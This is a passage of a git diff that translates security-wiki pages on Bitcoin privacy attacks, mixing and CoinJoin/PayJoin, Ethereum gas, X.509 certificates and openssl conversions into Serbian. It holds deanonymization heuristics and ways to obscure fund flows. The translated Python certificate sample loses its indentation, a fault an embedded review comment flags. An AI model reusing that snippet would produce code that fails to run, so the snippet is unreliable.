imajući korisnički prijatan front-end i transparentan, auditable back-end. +- **Tokeni i Kovanice** se razlikuju gde kovanice služe kao digitalni novac, dok tokeni predstavljaju vrednost ili vlasništvo u specifičnim kontekstima. +- **Utility Tokeni** omogućavaju pristup uslugama, a **Security Tokeni** označavaju vlasništvo nad imovinom. +- **DeFi** označava Decentralizovane Finansije, nudeći finansijske usluge bez centralnih vlasti. +- **DEX** i **DAO** se odnose na Decentralizovane Berzanske Platforme i Decentralizovane Autonomne Organizacije, redom. 
-## Consensus Mechanisms +## Mehanizmi Konsenzusa -Consensus mechanisms ensure secure and agreed transaction validations on the blockchain: +Mehanizmi konsenzusa osiguravaju sigurne i dogovorene validacije transakcija na blockchain-u: -- **Proof of Work (PoW)** relies on computational power for transaction verification. -- **Proof of Stake (PoS)** demands validators to hold a certain amount of tokens, reducing energy consumption compared to PoW. +- **Proof of Work (PoW)** se oslanja na računarsku snagu za verifikaciju transakcija. +- **Proof of Stake (PoS)** zahteva od validatora da drže određenu količinu tokena, smanjujući potrošnju energije u poređenju sa PoW. -## Bitcoin Essentials +## Osnovne Informacije o Bitcoinu -### Transactions +### Transakcije -Bitcoin transactions involve transferring funds between addresses. Transactions are validated through digital signatures, ensuring only the owner of the private key can initiate transfers. +Bitcoin transakcije uključuju prebacivanje sredstava između adresa. Transakcije se validiraju putem digitalnih potpisa, osiguravajući da samo vlasnik privatnog ključa može inicirati transfere. -#### Key Components: +#### Ključne Komponente: -- **Multisignature Transactions** require multiple signatures to authorize a transaction. -- Transactions consist of **inputs** (source of funds), **outputs** (destination), **fees** (paid to miners), and **scripts** (transaction rules). +- **Multisignature Transakcije** zahtevaju više potpisa za autorizaciju transakcije. +- Transakcije se sastoje od **ulaza** (izvor sredstava), **izlaza** (odredište), **naknada** (plaćene rudarima) i **skripti** (pravila transakcije). ### Lightning Network -Aims to enhance Bitcoin's scalability by allowing multiple transactions within a channel, only broadcasting the final state to the blockchain. +Cilj je poboljšati skalabilnost Bitcoina omogućavajući više transakcija unutar kanala, samo emitovanjem konačnog stanja na blockchain. 
-## Bitcoin Privacy Concerns +## Problemi Privatnosti Bitcoina -Privacy attacks, such as **Common Input Ownership** and **UTXO Change Address Detection**, exploit transaction patterns. Strategies like **Mixers** and **CoinJoin** improve anonymity by obscuring transaction links between users. +Napadi na privatnost, kao što su **Common Input Ownership** i **UTXO Change Address Detection**, koriste obrasce transakcija. Strategije poput **Mixers** i **CoinJoin** poboljšavaju anonimnost prikrivanjem veza između transakcija korisnika. -## Acquiring Bitcoins Anonymously +## Sticanje Bitcoina Anonimno -Methods include cash trades, mining, and using mixers. **CoinJoin** mixes multiple transactions to complicate traceability, while **PayJoin** disguises CoinJoins as regular transactions for heightened privacy. +Metode uključuju gotovinske trgovine, rudarenje i korišćenje miksera. **CoinJoin** meša više transakcija kako bi otežao praćenje, dok **PayJoin** prikriva CoinJoins kao obične transakcije za povećanu privatnost. -# Bitcoin Privacy Atacks +# Napadi na Privatnost Bitcoina -# Summary of Bitcoin Privacy Attacks +# Sažetak Napada na Privatnost Bitcoina -In the world of Bitcoin, the privacy of transactions and the anonymity of users are often subjects of concern. Here's a simplified overview of several common methods through which attackers can compromise Bitcoin privacy. +U svetu Bitcoina, privatnost transakcija i anonimnost korisnika često su predmet zabrinutosti. Evo pojednostavljenog pregleda nekoliko uobičajenih metoda kroz koje napadači mogu kompromitovati privatnost Bitcoina. -## **Common Input Ownership Assumption** +## **Pretpostavka Zajedničkog Vlasništva Ulaza** -It is generally rare for inputs from different users to be combined in a single transaction due to the complexity involved. Thus, **two input addresses in the same transaction are often assumed to belong to the same owner**. 
+Generalno je retko da se ulazi različitih korisnika kombinuju u jednoj transakciji zbog složenosti koja je uključena. Tako se **dve adrese ulaza u istoj transakciji često pretpostavljaju da pripadaju istom vlasniku**. -## **UTXO Change Address Detection** +## **UTXO Adresa Promene Detekcija** -A UTXO, or **Unspent Transaction Output**, must be entirely spent in a transaction. If only a part of it is sent to another address, the remainder goes to a new change address. Observers can assume this new address belongs to the sender, compromising privacy. +UTXO, ili **Unspent Transaction Output**, mora biti potpuno potrošen u transakciji. Ako se samo deo pošalje na drugu adresu, ostatak ide na novu adresu promene. Posmatrači mogu pretpostaviti da ova nova adresa pripada pošiljaocu, kompromitujući privatnost. -### Example +### Primer -To mitigate this, mixing services or using multiple addresses can help obscure ownership. +Da bi se to ublažilo, usluge mešanja ili korišćenje više adresa mogu pomoći u prikrivanju vlasništva. -## **Social Networks & Forums Exposure** +## **Izloženost Društvenih Mreža i Foruma** -Users sometimes share their Bitcoin addresses online, making it **easy to link the address to its owner**. +Korisnici ponekad dele svoje Bitcoin adrese na mreži, što olakšava **povezivanje adrese sa njenim vlasnikom**. -## **Transaction Graph Analysis** +## **Analiza Transakcionih Grafova** -Transactions can be visualized as graphs, revealing potential connections between users based on the flow of funds. +Transakcije se mogu vizualizovati kao grafovi, otkrivajući potencijalne veze između korisnika na osnovu toka sredstava. -## **Unnecessary Input Heuristic (Optimal Change Heuristic)** +## **Heuristika Nepotrebnog Ulaza (Optimalna Heuristika Promene)** -This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender. 
- -### Example +Ova heuristika se zasniva na analizi transakcija sa više ulaza i izlaza kako bi se pogodilo koji izlaz je promena koja se vraća pošiljaocu. +### Primer ```bash 2 btc --> 4 btc 3 btc 1 btc ``` +Ako dodavanje više ulaza čini izlaz veći od bilo kog pojedinačnog ulaza, to može zbuniti heuristiku. -If adding more inputs makes the change output larger than any single input, it can confuse the heuristic. +## **Prisilna Ponovna Upotreba Adresa** -## **Forced Address Reuse** +Napadači mogu slati male iznose na prethodno korišćene adrese, nadajući se da će primalac kombinovati ove sa drugim ulazima u budućim transakcijama, čime se povezuju adrese. -Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together. +### Ispravno Ponašanje Novčanika -### Correct Wallet Behavior +Novčanici bi trebali izbegavati korišćenje kovanica primljenih na već korišćenim, praznim adresama kako bi se sprečilo ovo curenje privatnosti. -Wallets should avoid using coins received on already used, empty addresses to prevent this privacy leak. +## **Druge Tehnike Analize Blockchain-a** -## **Other Blockchain Analysis Techniques** +- **Tačni Iznosi Plaćanja:** Transakcije bez kusura su verovatno između dve adrese koje poseduje isti korisnik. +- **Celi Brojevi:** Celi broj u transakciji sugeriše da je to plaćanje, pri čemu je ne-celi izlaz verovatno kusur. +- **Otisak Novčanika:** Različiti novčanici imaju jedinstvene obrasce kreiranja transakcija, što omogućava analitičarima da identifikuju korišćen softver i potencijalno adresu kusura. +- **Korelacije Iznosa i Vremena:** Otkriće vremena ili iznosa transakcija može učiniti transakcije tragovima. -- **Exact Payment Amounts:** Transactions without change are likely between two addresses owned by the same user. 
-- **Round Numbers:** A round number in a transaction suggests it's a payment, with the non-round output likely being the change. -- **Wallet Fingerprinting:** Different wallets have unique transaction creation patterns, allowing analysts to identify the software used and potentially the change address. -- **Amount & Timing Correlations:** Disclosing transaction times or amounts can make transactions traceable. +## **Analiza Saobraćaja** -## **Traffic Analysis** +Praćenjem mrežnog saobraćaja, napadači mogu potencijalno povezati transakcije ili blokove sa IP adresama, ugrožavajući privatnost korisnika. Ovo je posebno tačno ako entitet upravlja mnogim Bitcoin čvorovima, što poboljšava njihovu sposobnost praćenja transakcija. -By monitoring network traffic, attackers can potentially link transactions or blocks to IP addresses, compromising user privacy. This is especially true if an entity operates many Bitcoin nodes, enhancing their ability to monitor transactions. +## Više -## More +Za sveobuhvatan spisak napada na privatnost i odbrana, posetite [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). -For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). +# Anonimne Bitcoin Transakcije -# Anonymous Bitcoin Transactions +## Načini za Sticanje Bitcoina Anonimno -## Ways to Get Bitcoins Anonymously +- **Transakcije Gotovinom**: Sticanje bitcoina putem gotovine. +- **Alternativa Gotovini**: Kupovina poklon kartica i njihova razmena online za bitcoin. +- **Rudarenje**: Najprivatnija metoda za zarađivanje bitcoina je kroz rudarenje, posebno kada se radi samostalno, jer rudarske grupe mogu znati IP adresu rudara. [Informacije o Rudarskim Grupama](https://en.bitcoin.it/wiki/Pooled_mining) +- **Krađa**: Teoretski, krađa bitcoina bi mogla biti još jedna metoda za sticanje anonimno, iako je to ilegalno i ne preporučuje se. -- **Cash Transactions**: Acquiring bitcoin through cash. 
-- **Cash Alternatives**: Purchasing gift cards and exchanging them online for bitcoin. -- **Mining**: The most private method to earn bitcoins is through mining, especially when done alone because mining pools may know the miner's IP address. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining) -- **Theft**: Theoretically, stealing bitcoin could be another method to acquire it anonymously, although it's illegal and not recommended. +## Servisi za Mešanje -## Mixing Services - -By using a mixing service, a user can **send bitcoins** and receive **different bitcoins in return**, which makes tracing the original owner difficult. Yet, this requires trust in the service not to keep logs and to actually return the bitcoins. Alternative mixing options include Bitcoin casinos. +Korišćenjem servisa za mešanje, korisnik može **poslati bitcoine** i primiti **različite bitcoine u zamenu**, što otežava praćenje originalnog vlasnika. Ipak, ovo zahteva poverenje u servis da ne čuva evidenciju i da zaista vrati bitcoine. Alternativne opcije mešanja uključuju Bitcoin kockarnice. ## CoinJoin -**CoinJoin** merges multiple transactions from different users into one, complicating the process for anyone trying to match inputs with outputs. Despite its effectiveness, transactions with unique input and output sizes can still potentially be traced. +**CoinJoin** spaja više transakcija od različitih korisnika u jednu, komplikujući proces za svakoga ko pokušava da uskladi ulaze sa izlazima. I pored svoje efikasnosti, transakcije sa jedinstvenim ulaznim i izlaznim veličinama i dalje se potencijalno mogu pratiti. -Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. 
+Primeri transakcija koje su možda koristile CoinJoin uključuju `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` i `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. -For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners. +Za više informacija, posetite [CoinJoin](https://coinjoin.io/en). Za sličnu uslugu na Ethereum-u, pogledajte [Tornado Cash](https://tornado.cash), koja anonimizuje transakcije sa sredstvima od rudara. ## PayJoin -A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities. - +Varijanta CoinJoin-a, **PayJoin** (ili P2EP), prikriva transakciju između dve strane (npr. kupca i trgovca) kao redovnu transakciju, bez karakterističnih jednakih izlaza koji su karakteristični za CoinJoin. Ovo čini izuzetno teškim otkrivanje i moglo bi da poništi heuristiku zajedničkog vlasništva ulaza koju koriste entiteti za nadzor transakcija. ```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` +Transakcije poput gornjih mogle bi biti PayJoin, poboljšavajući privatnost dok ostaju neprepoznatljive od standardnih bitcoin transakcija. -Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions. +**Korišćenje PayJoin moglo bi značajno ometati tradicionalne metode nadzora**, čineći ga obećavajućim razvojem u potrazi za transakcionom privatnošću. -**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy. 
+# Najbolje prakse za privatnost u kriptovalutama -# Best Practices for Privacy in Cryptocurrencies +## **Tehnike sinhronizacije novčanika** -## **Wallet Synchronization Techniques** +Da bi se održala privatnost i sigurnost, sinhronizacija novčanika sa blockchain-om je ključna. Dve metode se ističu: -To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out: +- **Puni čvor**: Preuzimanjem celog blockchain-a, puni čvor osigurava maksimalnu privatnost. Sve transakcije ikada izvršene se čuvaju lokalno, što onemogućava protivnicima da identifikuju koje transakcije ili adrese korisnik zanima. +- **Filtriranje blokova na klijentskoj strani**: Ova metoda uključuje kreiranje filtera za svaki blok u blockchain-u, omogućavajući novčanicima da identifikuju relevantne transakcije bez izlaganja specifičnih interesa posmatračima mreže. Laki novčanici preuzimaju ove filtere, preuzimajući pune blokove samo kada se pronađe podudaranje sa adresama korisnika. -- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in. -- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found. +## **Korišćenje Tora za anonimnost** -## **Utilizing Tor for Anonymity** +S obzirom na to da Bitcoin funkcioniše na peer-to-peer mreži, preporučuje se korišćenje Tora za maskiranje vaše IP adrese, poboljšavajući privatnost prilikom interakcije sa mrežom. 
-Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network. +## **Sprečavanje ponovne upotrebe adresa** -## **Preventing Address Reuse** +Da bi se zaštitila privatnost, važno je koristiti novu adresu za svaku transakciju. Ponovna upotreba adresa može kompromitovati privatnost povezivanjem transakcija sa istim entitetom. Moderni novčanici obeshrabruju ponovnu upotrebu adresa kroz svoj dizajn. -To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design. +## **Strategije za privatnost transakcija** -## **Strategies for Transaction Privacy** +- **Više transakcija**: Deljenje uplate na nekoliko transakcija može zamagliti iznos transakcije, ometajući napade na privatnost. +- **Izbegavanje promena**: Odabir transakcija koje ne zahtevaju promene poboljšava privatnost ometajući metode detekcije promena. +- **Više izlaza za promenu**: Ako izbegavanje promene nije izvodljivo, generisanje više izlaza za promenu može i dalje poboljšati privatnost. -- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks. -- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods. -- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy. +# **Monero: Svetionik anonimnosti** -# **Monero: A Beacon of Anonymity** +Monero se bavi potrebom za apsolutnom anonimnošću u digitalnim transakcijama, postavljajući visoke standarde za privatnost. -Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy. 
+# **Ethereum: Gas i transakcije** -# **Ethereum: Gas and Transactions** +## **Razumevanje gasa** -## **Understanding Gas** +Gas meri računski napor potreban za izvršavanje operacija na Ethereum-u, a cena je u **gwei**. Na primer, transakcija koja košta 2,310,000 gwei (ili 0.00231 ETH) uključuje gas limit i osnovnu naknadu, uz napojnicu za podsticanje rudara. Korisnici mogu postaviti maksimalnu naknadu kako bi osigurali da ne preplate, a višak se vraća. -Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded. +## **Izvršavanje transakcija** -## **Executing Transactions** +Transakcije na Ethereum-u uključuju pošiljaoca i primaoca, koji mogu biti adrese korisnika ili pametnih ugovora. One zahtevaju naknadu i moraju biti rudarenje. Osnovne informacije u transakciji uključuju primaoca, potpis pošiljaoca, vrednost, opcione podatke, gas limit i naknade. Značajno je da se adresa pošiljaoca deducira iz potpisa, eliminišući potrebu za njom u podacima transakcije. -Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data. +Ove prakse i mehanizmi su osnovni za svakoga ko želi da se bavi kriptovalutama dok prioritet daje privatnosti i sigurnosti. -These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security. 
- -## References +## Reference - [https://en.wikipedia.org/wiki/Proof_of_stake](https://en.wikipedia.org/wiki/Proof_of_stake) - [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) diff --git a/src/crypto-and-stego/certificates.md b/src/crypto-and-stego/certificates.md index d0c4ad006..ea9c2747c 100644 --- a/src/crypto-and-stego/certificates.md +++ b/src/crypto-and-stego/certificates.md @@ -1,47 +1,38 @@ -# Certificates +# Sertifikati {{#include ../banners/hacktricks-training.md}} -
+## Šta je Sertifikat -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +**Javni ključ sertifikat** je digitalni ID koji se koristi u kriptografiji da dokaže da neko poseduje javni ključ. Uključuje detalje o ključevi, identitet vlasnika (subjekt) i digitalni potpis od poverljive vlasti (izdavača). Ako softver veruje izdavaču i potpis je validan, sigurna komunikacija sa vlasnikom ključa je moguća. -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %} +Sertifikati se uglavnom izdaju od strane [sertifikacionih tela](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) u [infrastrukturi javnog ključa](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) postavci. Druga metoda je [mreža poverenja](https://en.wikipedia.org/wiki/Web_of_trust), gde korisnici direktno verifikuju ključeve jedni drugih. Uobičajeni format za sertifikate je [X.509](https://en.wikipedia.org/wiki/X.509), koji se može prilagoditi specifičnim potrebama kako je navedeno u RFC 5280. -## What is a Certificate +## x509 Uobičajena Polja -A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible. +### **Uobičajena Polja u x509 Sertifikatima** -Certificates are mostly issued by [certificate authorities](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) in a [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) setup. 
Another method is the [web of trust](https://en.wikipedia.org/wiki/Web_of_trust), where users directly verify each other’s keys. The common format for certificates is [X.509](https://en.wikipedia.org/wiki/X.509), which can be adapted for specific needs as outlined in RFC 5280. +U x509 sertifikatima, nekoliko **polja** igra ključne uloge u obezbeđivanju validnosti i sigurnosti sertifikata. Evo pregleda ovih polja: -## x509 Common Fields +- **Broj Verzije** označava verziju x509 formata. +- **Serijski Broj** jedinstveno identifikuje sertifikat unutar sistema Sertifikacione vlasti (CA), uglavnom za praćenje opoziva. +- **Subjekt** polje predstavlja vlasnika sertifikata, što može biti mašina, pojedinac ili organizacija. Uključuje detaljnu identifikaciju kao što su: +- **Uobičajeno Ime (CN)**: Domeni pokriveni sertifikatom. +- **Zemlja (C)**, **Lokacija (L)**, **Država ili Pokrajina (ST, S, ili P)**, **Organizacija (O)**, i **Organizaciona Jedinica (OU)** pružaju geografske i organizacione detalje. +- **Istaknuto Ime (DN)** obuhvata punu identifikaciju subjekta. +- **Izdavač** detaljno opisuje ko je verifikovao i potpisao sertifikat, uključujući slična podpolja kao Subjekt za CA. +- **Period Validnosti** označen je **Ne Pre** i **Ne Posle** vremenskim oznakama, osiguravajući da sertifikat nije korišćen pre ili posle određenog datuma. +- **Javni Ključ** sekcija, ključna za sigurnost sertifikata, specificira algoritam, veličinu i druge tehničke detalje javnog ključa. +- **x509v3 ekstenzije** poboljšavaju funkcionalnost sertifikata, specificirajući **Korišćenje Ključa**, **Prošireno Korišćenje Ključa**, **Alternativno Ime Subjekta**, i druge osobine za fino podešavanje primene sertifikata. -### **Common Fields in x509 Certificates** - -In x509 certificates, several **fields** play critical roles in ensuring the certificate's validity and security. Here's a breakdown of these fields: - -- **Version Number** signifies the x509 format's version. 
-- **Serial Number** uniquely identifies the certificate within a Certificate Authority's (CA) system, mainly for revocation tracking. -- The **Subject** field represents the certificate's owner, which could be a machine, an individual, or an organization. It includes detailed identification such as: - - **Common Name (CN)**: Domains covered by the certificate. - - **Country (C)**, **Locality (L)**, **State or Province (ST, S, or P)**, **Organization (O)**, and **Organizational Unit (OU)** provide geographical and organizational details. - - **Distinguished Name (DN)** encapsulates the full subject identification. -- **Issuer** details who verified and signed the certificate, including similar subfields as the Subject for the CA. -- **Validity Period** is marked by **Not Before** and **Not After** timestamps, ensuring the certificate is not used before or after a certain date. -- The **Public Key** section, crucial for the certificate's security, specifies the algorithm, size, and other technical details of the public key. -- **x509v3 extensions** enhance the certificate's functionality, specifying **Key Usage**, **Extended Key Usage**, **Subject Alternative Name**, and other properties to fine-tune the certificate's application. - -#### **Key Usage and Extensions** - -- **Key Usage** identifies cryptographic applications of the public key, like digital signature or key encipherment. -- **Extended Key Usage** further narrows down the certificate's use cases, e.g., for TLS server authentication. -- **Subject Alternative Name** and **Basic Constraint** define additional host names covered by the certificate and whether it's a CA or end-entity certificate, respectively. -- Identifiers like **Subject Key Identifier** and **Authority Key Identifier** ensure uniqueness and traceability of keys. -- **Authority Information Access** and **CRL Distribution Points** provide paths to verify the issuing CA and check certificate revocation status. 
-- **CT Precertificate SCTs** offer transparency logs, crucial for public trust in the certificate. +#### **Korišćenje Ključa i Ekstenzije** +- **Korišćenje Ključa** identifikuje kriptografske primene javnog ključa, kao što su digitalni potpis ili enkripcija ključa. +- **Prošireno Korišćenje Ključa** dodatno sužava slučajeve korišćenja sertifikata, npr. za TLS autentifikaciju servera. +- **Alternativno Ime Subjekta** i **Osnovna Ograničenja** definišu dodatne nazive hostova pokrivene sertifikatom i da li je to CA ili sertifikat krajnjeg entiteta, redom. +- Identifikatori kao što su **Identifikator Ključa Subjekta** i **Identifikator Ključa Vlasti** osiguravaju jedinstvenost i praćenje ključeva. +- **Pristup Informacijama o Vlasti** i **CRL Distribucione Tačke** pružaju puteve za verifikaciju izdavača CA i proveru statusa opoziva sertifikata. +- **CT Precertifikat SCTs** nude transparente dnevnike, što je ključno za javno poverenje u sertifikat. ```python # Example of accessing and using x509 certificate fields programmatically: from cryptography import x509 @@ -49,8 +40,8 @@ from cryptography.hazmat.backends import default_backend # Load an x509 certificate (assuming cert.pem is a certificate file) with open("cert.pem", "rb") as file: - cert_data = file.read() - certificate = x509.load_pem_x509_certificate(cert_data, default_backend()) +cert_data = file.read() +certificate = x509.load_pem_x509_certificate(cert_data, default_backend()) # Accessing fields serial_number = certificate.serial_number 
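Review bot: the `@@ -49,8 +40,8 @@` hunk breaks the Python example: the two `+` lines (`+cert_data = file.read()` and `+certificate = x509.load_pem_x509_certificate(...)`) drop the four-space indent that the `-` lines had under `with open("cert.pem", "rb") as file:`, so the `with` block has no body and the snippet fails with an IndentationError before it reaches the field-access code. Restore the indentation on both lines (the change should be translation-only, not a whitespace change inside a fenced code block). In the preceding hunk, "Javni ključ sertifikat" and "detalje o ključevi" do not parse; "Sertifikat javnog ključa" and "detalje o ključu" read naturally.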
@@ -63,160 +54,123 @@ print(f"Issuer: {issuer}") print(f"Subject: {subject}") print(f"Public Key: {public_key}") ``` +### **Razlika između OCSP i CRL distribucionih tačaka** -### **Difference between OCSP and CRL Distribution Points** +**OCSP** (**RFC 2560**) uključuje klijenta i odgovarača koji zajedno proveravaju da li je digitalni javni ključ sertifikat opozvan, bez potrebe za preuzimanjem celog **CRL**. Ova metoda je efikasnija od tradicionalnog **CRL**, koji pruža listu opozvanih serijskih brojeva sertifikata, ali zahteva preuzimanje potencijalno velikog fajla. CRL može sadržati do 512 unosa. Više detalja je dostupno [ovde](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm). -**OCSP** (**RFC 2560**) involves a client and a responder working together to check if a digital public-key certificate has been revoked, without needing to download the full **CRL**. This method is more efficient than the traditional **CRL**, which provides a list of revoked certificate serial numbers but requires downloading a potentially large file. CRLs can include up to 512 entries. More details are available [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm). +### **Šta je transparentnost sertifikata** -### **What is Certificate Transparency** +Transparentnost sertifikata pomaže u borbi protiv pretnji vezanih za sertifikate osiguravajući da je izdavanje i postojanje SSL sertifikata vidljivo vlasnicima domena, CA i korisnicima. Njeni ciljevi su: -Certificate Transparency helps combat certificate-related threats by ensuring the issuance and existence of SSL certificates are visible to domain owners, CAs, and users. Its objectives are: +- Sprečavanje CA da izdaju SSL sertifikate za domen bez znanja vlasnika domena. +- Uspostavljanje otvorenog sistema revizije za praćenje greškom ili zlonamerno izdatih sertifikata. 
+- Zaštita korisnika od prevarantskih sertifikata. -- Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge. -- Establishing an open auditing system for tracking mistakenly or maliciously issued certificates. -- Safeguarding users against fraudulent certificates. +#### **Dnevnici sertifikata** -#### **Certificate Logs** +Dnevnici sertifikata su javno revizibilni, samo za dodavanje zapisi o sertifikatima, koje održavaju mrežne usluge. Ovi dnevnici pružaju kriptografske dokaze za svrhe revizije. Izdavaoci i javnost mogu podnositi sertifikate ovim dnevnicima ili ih pretraživati radi verifikacije. Dok tačan broj servera za dnevnik nije fiksiran, očekuje se da će biti manje od hiljadu globalno. Ove servere mogu nezavisno upravljati CA, ISP ili bilo koja zainteresovana strana. -Certificate logs are publicly auditable, append-only records of certificates, maintained by network services. These logs provide cryptographic proofs for auditing purposes. Both issuance authorities and the public can submit certificates to these logs or query them for verification. While the exact number of log servers is not fixed, it's expected to be less than a thousand globally. These servers can be independently managed by CAs, ISPs, or any interested entity. +#### **Upit** -#### **Query** +Da biste istražili dnevnike transparentnosti sertifikata za bilo koji domen, posetite [https://crt.sh/](https://crt.sh). -To explore Certificate Transparency logs for any domain, visit [https://crt.sh/](https://crt.sh). +Postoje različiti formati za skladištenje sertifikata, svaki sa svojim slučajevima upotrebe i kompatibilnošću. Ovaj pregled pokriva glavne formate i pruža smernice za konvertovanje između njih. -Different formats exist for storing certificates, each with its own use cases and compatibility. This summary covers the main formats and provides guidance on converting between them. 
+## **Formati** -## **Formats** +### **PEM format** -### **PEM Format** +- Najšire korišćen format za sertifikate. +- Zahteva odvojene fajlove za sertifikate i privatne ključeve, kodirane u Base64 ASCII. +- Uobičajene ekstenzije: .cer, .crt, .pem, .key. +- Pretežno koriste Apache i slični serveri. -- Most widely used format for certificates. -- Requires separate files for certificates and private keys, encoded in Base64 ASCII. -- Common extensions: .cer, .crt, .pem, .key. -- Primarily used by Apache and similar servers. +### **DER format** -### **DER Format** +- Binarni format sertifikata. +- Nedostaju "BEGIN/END CERTIFICATE" izjave koje se nalaze u PEM fajlovima. +- Uobičajene ekstenzije: .cer, .der. +- Često se koristi sa Java platformama. -- A binary format of certificates. -- Lacks the "BEGIN/END CERTIFICATE" statements found in PEM files. -- Common extensions: .cer, .der. -- Often used with Java platforms. +### **P7B/PKCS#7 format** -### **P7B/PKCS#7 Format** +- Skladišti se u Base64 ASCII, sa ekstenzijama .p7b ili .p7c. +- Sadrži samo sertifikate i lance sertifikata, isključujući privatni ključ. +- Podržava ga Microsoft Windows i Java Tomcat. -- Stored in Base64 ASCII, with extensions .p7b or .p7c. -- Contains only certificates and chain certificates, excluding the private key. -- Supported by Microsoft Windows and Java Tomcat. +### **PFX/P12/PKCS#12 format** -### **PFX/P12/PKCS#12 Format** +- Binarni format koji enkapsulira server sertifikate, međusertifikate i privatne ključeve u jednom fajlu. +- Ekstenzije: .pfx, .p12. +- Pretežno se koristi na Windows-u za uvoz i izvoz sertifikata. -- A binary format that encapsulates server certificates, intermediate certificates, and private keys in one file. -- Extensions: .pfx, .p12. -- Mainly used on Windows for certificate import and export. 
+### **Konvertovanje formata** -### **Converting Formats** - -**PEM conversions** are essential for compatibility: +**PEM konverzije** su neophodne za kompatibilnost: - **x509 to PEM** - ```bash openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem ``` - -- **PEM to DER** - +- **PEM u DER** ```bash openssl x509 -outform der -in certificatename.pem -out certificatename.der ``` - -- **DER to PEM** - +- **DER u PEM** ```bash openssl x509 -inform der -in certificatename.der -out certificatename.pem ``` - -- **PEM to P7B** - +- **PEM u P7B** ```bash openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer ``` - -- **PKCS7 to PEM** - +- **PKCS7 u PEM** ```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem ``` +**PFX konverzije** su ključne za upravljanje sertifikatima na Windows-u: -**PFX conversions** are crucial for managing certificates on Windows: - -- **PFX to PEM** - +- **PFX u PEM** ```bash openssl pkcs12 -in certificatename.pfx -out certificatename.pem ``` - -- **PFX to PKCS#8** involves two steps: - 1. Convert PFX to PEM - +- **PFX to PKCS#8** uključuje dva koraka: +1. Konvertujte PFX u PEM ```bash openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem ``` - -2. Convert PEM to PKCS8 - +2. Konvertujte PEM u PKCS8 ```bash openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8 ``` - -- **P7B to PFX** also requires two commands: - 1. Convert P7B to CER - +- **P7B to PFX** takođe zahteva dve komande: +1. Konvertujte P7B u CER ```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer ``` - -2. Convert CER and Private Key to PFX - +2. Konvertujte CER i privatni ključ u PFX ```bash openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer ``` - -- **ASN.1 